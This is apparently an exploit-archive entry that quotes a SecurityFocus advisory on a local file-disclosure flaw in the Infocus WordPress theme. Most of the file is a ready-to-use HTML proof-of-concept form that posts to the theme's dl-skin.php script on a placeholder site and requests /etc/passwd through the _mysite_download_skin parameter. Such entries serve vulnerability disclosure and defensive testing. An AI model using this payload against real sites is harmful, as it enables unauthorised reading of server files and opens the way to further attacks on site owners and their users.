14 lines
652 B
Text
Executable file
14 lines
652 B
Text
Executable file
source: http://www.securityfocus.com/bid/67934/info
|
|
|
|
The Infocus theme for WordPress is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
|
|
|
|
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post">
|
|
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
|
|
<input type="submit">
|
|
</form>
|
|
</body>
|
|
</html>
|